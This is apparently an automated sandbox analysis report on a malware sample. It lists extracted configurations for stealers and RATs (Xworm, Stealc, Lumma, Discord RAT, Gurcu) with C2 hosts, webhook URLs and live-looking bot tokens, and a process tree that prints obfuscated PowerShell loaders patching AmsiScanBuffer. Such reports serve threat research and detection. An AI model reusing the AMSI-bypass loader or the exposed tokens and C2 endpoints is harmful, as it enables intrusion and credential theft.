Resubmissions

16-12-2024 05:27

241216-f5kx6awmh1 10

14-12-2024 20:23

241214-y6jqlasrhy 10

14-12-2024 20:22

241214-y51bysvmbk 10

14-12-2024 20:13

241214-yzc98svkfr 10

14-12-2024 13:14

241214-qgw1masrcy 10

14-12-2024 13:12

241214-qfk7qsvlaq 3

12-12-2024 18:19

241212-wymq6ssnat 10

12-12-2024 18:16

241212-www7tssmet 10

Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 18:19

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMxNTQxMDg0NDg3NTQ4OTI4MA.Gx5ptK.HY1OYsjGMP1MsOoyD2E7T9pCvkfHTdOPozmb_c

  • server_id

    1315411300192616569

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:8080

101.99.92.189:8080

Mutex

d5gQ6Zf7Tzih1Pi1

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

44caliber

C2

https://discord.com/api/webhooks/1296494108667416678/ZASeLgYlw4OZSUv8h9jKQd4eY6ktpyF3T4vMXTNf0Ppbac5asKxIs_xZz8YEc__J4qsO

Extracted

Family

xworm

C2

127.0.0.1:58963

login-donor.gl.at.ply.gg:58963

Attributes
  • Install_directory

    %AppData%

  • install_file

    xdwd.exe

Extracted

Family

stealc

Botnet

Voov3

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Extracted

Family

stealc

Botnet

QQTalk2

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Extracted

Family

stealc

Botnet

Voov1

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Extracted

Family

xworm

Version

3.1

C2

camp.zapto.org:7771

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775

https://api.telegram.org/bot8081835502:AAFtGgtMdAzFeWYBpQcGx83fjDR_25zfjK0/sendDocument?chat_id=7538374929&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessag

Extracted

Family

lumma

C2

https://infect-crackle.cyou/api

https://covery-mover.biz/api

https://drive-connect.cyou/api

Signatures

  • 44Caliber

    An open source infostealer written in C#.

  • 44Caliber family
  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 8 IoCs
  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Rms family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 18 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Adds policy Run key to start application 2 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 27 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 23 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 21 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 20 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 42 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 17 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 9 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{fe9f5556-1e34-42c8-89ab-afa746c397ba}
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of FindShellTrayWindow
          PID:3328
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im conhost.exe
            3⤵
            • Kills process with taskkill
            PID:4172
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of SetThreadContext
        PID:668
        • C:\Windows\system32\lsass.exe
          "C:\Windows\system32\lsass.exe"
          2⤵
          • Drops file in System32 directory
          PID:5480
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:944
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:512
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1080
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1096
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                  PID:1136
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1152
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2232
                    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2280
                      • C:\Windows\explorer.exe
                        explorer.exe
                        3⤵
                          PID:4396
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          3⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          PID:996
                          • C:\Windows\system32\PING.EXE
                            "C:\Windows\system32\PING.EXE" 127.1.10.1
                            4⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:5948
                      • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2920
                        • C:\Windows\explorer.exe
                          explorer.exe
                          3⤵
                            PID:5340
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                            3⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            PID:4316
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              4⤵
                                PID:4140
                              • C:\Windows\system32\PING.EXE
                                "C:\Windows\system32\PING.EXE" 127.1.10.1
                                4⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:6100
                          • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                            C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3824
                            • C:\Windows\explorer.exe
                              explorer.exe
                              3⤵
                              • Suspicious use of FindShellTrayWindow
                              PID:5124
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                              3⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              PID:5928
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                4⤵
                                  PID:1976
                                • C:\Windows\system32\PING.EXE
                                  "C:\Windows\system32\PING.EXE" 127.1.0.1
                                  4⤵
                                  • System Network Configuration Discovery: Internet Connection Discovery
                                  • Runs ping.exe
                                  PID:5696
                            • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                              C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              PID:2556
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CgQTGPodzTyw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZyEeawiuPnMRLX,[Parameter(Position=1)][Type]$wSfwjGIeCy)$ManiboOSoeP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+'ec'+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+'l'+'e'+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+'lic'+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$ManiboOSoeP.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZyEeawiuPnMRLX).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ManiboOSoeP.DefineMethod(''+[Char](73)+'nv'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$wSfwjGIeCy,$ZyEeawiuPnMRLX).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ManiboOSoeP.CreateType();}$haNXAJHTYwclt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'oso'+[Char](102)+''+[Char](116)+'.'+'W'+'in'+[Char](51)+''+[Char](50)+'.U'+[Char](110)+''+'s'+'a'+[Char](102)+''+'e'+''+'N'+''+'a'+''+'t'+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$NrGAxwwLFLqQyk=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'St'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kdSiEeEamrpeWmNNzBq=CgQTGPodzTyw @([String])([IntPtr]);$DPejLfzLLASsBslOMGwLeo=CgQTGPodzTyw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WYKDbrTpXIs=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'ul'+[Char](101)+''+'H'+''+[Char](97)+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$jrOgFUmnXPKbva=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$ZwTtPthojZALcyERC=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+'e'+'c'+''+[Char](116)+'')));$SDmQSZZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jrOgFUmnXPKbva,$kdSiEeEamrpeWmNNzBq).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$QKqkiscBHXNBPBDjP=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$SDmQSZZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$wBiidsCSDH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,4,[ref]$wBiidsCSDH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QKqkiscBHXNBPBDjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,0x20,[ref]$wBiidsCSDH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+'E').GetValue('r'+[Char](117)+''+'t'+''+[Char](115)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              PID:5156
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                3⤵
                                  PID:5616
                              • C:\Windows\SysWOW64\ruts\rutserv.exe
                                C:\Windows\SysWOW64\ruts\rutserv.exe
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Modifies data under HKEY_USERS
                                • Suspicious use of SetWindowsHookEx
                                PID:6052
                                • C:\Windows\SysWOW64\ruts\rutserv.exe
                                  C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second
                                  3⤵
                                  • Loads dropped DLL
                                  • System Location Discovery: System Language Discovery
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1076
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VtjvVificAJN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kusngmbREwjGSW,[Parameter(Position=1)][Type]$XKFbtELJBS)$NuEpGtSOYnb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+'t'+''+'e'+''+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+'o'+''+[Char](67)+'la'+[Char](115)+'s',[MulticastDelegate]);$NuEpGtSOYnb.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$kusngmbREwjGSW).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$NuEpGtSOYnb.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$XKFbtELJBS,$kusngmbREwjGSW).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $NuEpGtSOYnb.CreateType();}$QUUJzFBntxEji=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+'dl'+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+'r'+'osof'+'t'+'.W'+'i'+'n32'+'.'+''+'U'+'ns'+[Char](97)+'feNa'+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$poHHlZzMgJrisA=$QUUJzFBntxEji.GetMethod('G'+'e'+''+'t'+''+[Char](80)+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ddbBMYDeVLMDspmiqfV=VtjvVificAJN @([String])([IntPtr]);$zNuQqnyONNTRQeuOxEpjTL=VtjvVificAJN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SwUOmIepTyu=$QUUJzFBntxEji.GetMethod(''+'G'+'et'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$ksSzcCsHSskmhO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'ra'+[Char](114)+''+[Char](121)+''+'A'+'')));$XCULVGkXQfUkHqulO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$yIAjRrv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ksSzcCsHSskmhO,$ddbBMYDeVLMDspmiqfV).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$lkSFLrDnoeSGJBDey=$poHHlZzMgJrisA.Invoke($Null,@([Object]$yIAjRrv,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$nAxVBtUsVE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,4,[ref]$nAxVBtUsVE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lkSFLrDnoeSGJBDey,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,0x20,[ref]$nAxVBtUsVE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+'R'+'E').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+'s'+[Char](115)+''+[Char](116)+''+'a'+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                2⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                PID:660
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  3⤵
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4268
                              • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:5132
                                • C:\Windows\explorer.exe
                                  explorer.exe
                                  3⤵
                                    PID:6548
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 6548 -s 388
                                      4⤵
                                      • Checks processor information in registry
                                      • Enumerates system info in registry
                                      PID:7316
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                    3⤵
